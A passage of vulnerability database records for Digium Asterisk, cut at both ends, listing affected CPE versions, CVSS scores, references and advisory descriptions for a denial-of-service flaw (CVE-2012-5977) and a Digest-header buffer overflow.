              "matchCriteriaId": "E3828876-DDB4-457D-8E50-43A4FF761005",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79283554-AF08-44DC-BF98-446C47AA490A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "52B5F73C-174A-4A0B-8D14-EC10779FC884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "54EBFD0B-686F-477F-8FF2-535F24A3348B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0961F130-FF8C-41C2-BF2E-9731ED9EB73B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9789FC49-DE20-4477-B9D5-12CB71F42E58",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*",
              "matchCriteriaId": "C63C46CC-02E2-40AF-8281-F2FB5D89823A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "71BAF2A7-024D-475A-88C0-0F5ADE3CA286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "82F91FE8-C320-466B-AF08-67319A00A2BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "DCFF0E1C-B455-4C18-8AA1-10408234327B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "738F68B3-2C5E-4A09-8FF4-2D034ED0C54D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6A60C223-AD68-4BFF-91C1-2C7E9F727AA6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "4C313F81-8B38-4845-B1C7-CBB23D7C99B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "A08731AB-1E43-48B9-AB4C-0B06A34D0807",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "5A4FBB03-4A60-4A34-855B-74C5079F7769",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "66E97D3F-3AEB-40EB-87E7-18EC7A84F0CA",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "6372EEEA-2759-4B6A-BD03-D84DC956E80E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "26DF0C53-9F6A-4233-B163-AEC1F9886387",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "79A063D7-553F-486F-9079-D95C8047B05E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B606D854-FC06-4314-AD24-FEEA3796A0AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "DEBB0786-D912-48D1-BC63-E0F87E078154",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1C39DD70-1220-4CC6-95B4-CE18CA5787CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B0005F0B-9C87-4160-9416-A7C136FCD5AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "12073B6A-14B1-490B-B267-A68194C68BDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "198C92F2-8268-4045-B297-17E0D1F9726E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "BF86A1A0-D3D7-485A-A46C-7619F74CE821",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "5D3A3C00-EA83-4EF4-8681-DB5616132607",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "5FE59F0F-44B0-4940-8368-F360EE610114",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "3647F0E3-196F-486B-9BAB-75ED24A055ED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1FBC4A5F-FB16-42B2-9689-25F8B3D0F521",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B788D6E2-78E8-4DE1-81F5-40D52263E7F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "51358F60-4D6C-4DBA-86B0-E12C48A67456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "D51C9952-97F4-4326-8F7D-34579D3686AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "3711A75C-AF87-4A5C-8B35-1CF834C12D2A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "E7FFD09D-21A3-4E98-B1FA-C7A16C243D91",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "FAC6591A-BC5A-4CA9-90BC-0B686F74127B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "01BAF29D-8679-40F3-AB6C-DA5C3787271C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B42229C3-B18E-4D50-9B98-202CB1805CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "15DF192B-A8D5-4FCC-B469-505A8FA11D00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "D24E01F7-604D-4D05-B698-3BDEF7B69EF8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "A54A74F4-8A6C-4090-88C2-8AB5A606C59B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.2:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "E65E012A-49B6-4796-B1FA-A83C9248D0EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "9F4C24B7-22E3-4E56-9B9F-414101B627FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1813B898-F957-40D7-AF9A-064FB57D5C82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "C5D07DB0-7C6A-4490-8FD0-DC83568E0421",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous calls are enabled, allow remote attackers to cause a denial of service (resource consumption) by making anonymous calls from multiple sources and consequently adding many entries to the device state cache."
    },
    {
      "lang": "es",
      "value": "Asterisk Open Source v1.8.x anteriores a v1.8.19.1, v10.x anteriores a v10.11.1, y v11.x anteriores a v11.1.2; Certified Asterisk v1.8.11 anteriores a v1.8.11-cert10; y Asterisk Digiumphones v10.x-digiumphones anteriores a v10.11.1-digiumphones, cuando est\u00e1n permitidas las llamadas an\u00f3nimas, permiten a atacantes remotos a provocar una denegaci\u00f3n de servicio(consumo de recursos) haciendo llamadas an\u00f3nimas desde m\u00faltiples fuentes y en consecuencia, a\u00f1adir varias entradas a la cach\u00e9 de estado del dispositivo."
    }
  ],
  "id": "CVE-2012-5977",
  "lastModified": "2024-11-21T01:45:38.077",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-01-04T15:55:02.447",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-015"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2013/dsa-2605"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-20175"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-015"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2013/dsa-2605"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-20175"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2012-09-18 18:55

Modified

2024-11-21 01:36

Severity ?

Summary

Stack-based buffer overflow in the ast_parse_digest function in main/utils.c in Asterisk 1.8.x before 1.8.10.1 and 10.x before 10.2.1 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long string in an HTTP Digest Authentication header.

References

URL	Tags
secalert@redhat.com	http://downloads.asterisk.org/pub/security/AST-2012-003-1.8.diff
secalert@redhat.com	http://downloads.asterisk.org/pub/security/AST-2012-003.pdf	Vendor Advisory
secalert@redhat.com	http://osvdb.org/80126
secalert@redhat.com	http://secunia.com/advisories/48417	Vendor Advisory
secalert@redhat.com	http://www.asterisk.org/node/51797	Vendor Advisory
secalert@redhat.com	http://www.openwall.com/lists/oss-security/2012/03/16/10
secalert@redhat.com	http://www.openwall.com/lists/oss-security/2012/03/16/17
secalert@redhat.com	http://www.securitytracker.com/id?1026813
secalert@redhat.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/74083
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-003-1.8.diff
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-003.pdf	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/80126
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/48417	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.asterisk.org/node/51797	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.openwall.com/lists/oss-security/2012/03/16/10
af854a3a-2127-422b-91ae-364da2661108	http://www.openwall.com/lists/oss-security/2012/03/16/17
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1026813
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/74083

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.1
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.1
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.1
digium	asterisk	10.1.2
digium	asterisk	10.1.3
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "82423EC2-FA29-4AF6-86C3-6AC6DFDC4DC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
